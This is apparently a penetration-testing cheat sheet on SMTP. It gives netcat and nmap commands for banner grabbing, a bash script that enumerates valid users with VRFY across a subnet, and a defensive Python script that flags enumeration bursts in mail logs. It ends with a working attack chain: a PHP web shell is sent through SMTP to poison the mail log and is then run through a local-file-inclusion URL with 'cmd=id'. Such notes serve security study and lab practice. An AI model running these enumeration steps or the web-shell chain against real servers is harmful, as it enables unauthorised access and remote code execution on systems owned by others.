# SMTP Enum

### Checklist

* Check for version
* LFI chaining with log file poisoning
* User enumeration

### Grab the banner and VRFY

```
nc -nv 10.11.12.8 25 
VRFY bob 
250 2.1.5 
bob@redhat.active.com                  <--- Output if user exists
 
VRFY idontexist 
550 5.1.1 idontexist... User unknown   <--- Output if user does not exist
```

**EXPN request:** asks the server for the membership of a mailing list.

### Bash Script for SMTP

```
#!/bin/bash

# VRFY Script
#############
# numbers.txt: one last octet per line (hosts are built as 10.11.1.<octet>)
# users.txt:   one username per line
# Prints only "250" replies, i.e. the usernames the server confirms exist.

while read -r octet; do
	while read -r user; do
		echo "VRFY $user" | nc -nv -w 1 "10.11.1.$octet" 25 2>/dev/null | grep "^250"
	done < users.txt
done < numbers.txt
```

### SMTP nmap scripts

```
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
```

### **SMTP user enum**

```
smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10
```
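The flip side of the VRFY/EXPN probing above, for whoever runs the mail server: an added example (not from the original cheat sheet) that scans mail logs for bursts of VRFY/EXPN probes from one client and reports the addresses that were tried. The log lines are constructed in a Postfix-like syslog format; the regex (`LINE_RE`) and the threshold/window values are assumptions to adjust for your MTA.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not from a real host), approximating the
# "NOQUEUE: reject: VRFY from host[ip]: 550 ..." form Postfix logs for
# a VRFY/EXPN probe that names an unknown user.
SAMPLE_LOG = """\
Mar  3 10:00:01 mx postfix/smtpd[2211]: connect from unknown[10.11.1.7]
Mar  3 10:00:02 mx postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.11.1.7]: 550 5.1.1 <alice@example.com>: Recipient address rejected: User unknown
Mar  3 10:00:02 mx postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.11.1.7]: 550 5.1.1 <admin@example.com>: Recipient address rejected: User unknown
Mar  3 10:00:03 mx postfix/smtpd[2211]: NOQUEUE: reject: VRFY from unknown[10.11.1.7]: 550 5.1.1 <root@example.com>: Recipient address rejected: User unknown
Mar  3 10:00:03 mx postfix/smtpd[2211]: NOQUEUE: reject: EXPN from unknown[10.11.1.7]: 550 5.1.1 <staff@example.com>: Recipient address rejected: User unknown
Mar  3 10:05:00 mx postfix/smtpd[2230]: NOQUEUE: reject: VRFY from mail.partner.test[192.0.2.9]: 550 5.1.1 <bob@example.com>: Recipient address rejected: User unknown
Mar  3 10:00:09 mx postfix/smtpd[2211]: disconnect from unknown[10.11.1.7]
"""

# Assumed log shape: syslog timestamp, then "VRFY|EXPN from host[ip]: <code> <enhanced> <addr>".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?: (?P<cmd>VRFY|EXPN) from "
    r"(?P<host>\S+?)\[(?P<ip>[\d.]+)\]: \d{3} [\d.]+ <(?P<addr>[^>]+)>"
)

def parse_probes(log_text, year=2024):
    """Yield (timestamp, client_ip, command, probed_address) for each VRFY/EXPN line."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:  # syslog lines carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["cmd"], m["addr"]

def find_enumerators(log_text, threshold=3, window_seconds=60):
    """Return {client_ip: sorted probed addresses} for every client that probed
    at least `threshold` distinct addresses within any `window_seconds` span."""
    by_ip = defaultdict(list)
    for ts, ip, _cmd, addr in parse_probes(log_text):
        by_ip[ip].append((ts, addr))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()  # sliding window over time-ordered probes
        for i, (start, _) in enumerate(events):
            in_window = {a for t, a in events[i:] if (t - start).total_seconds() <= window_seconds}
            if len(in_window) >= threshold:
                flagged[ip] = sorted({a for _, a in events})
                break
    return flagged

if __name__ == "__main__":
    for ip, addrs in find_enumerators(SAMPLE_LOG).items():
        print(f"possible user enumeration from {ip}: {len(addrs)} addresses probed")
```

A single probe from the partner host stays below the threshold, while the burst of four distinct addresses within seconds from 10.11.1.7 is flagged.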

### **Code Execution through SMTP/LFI**

```
telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:someself@nodomain.io
rcpt to: username@localhost
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>

.
```

After this, on the LFI you have discovered, just add the `cmd` variable (`?cmd=id` if it is the first parameter, `&cmd=id` otherwise).

Examples:

```
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
```
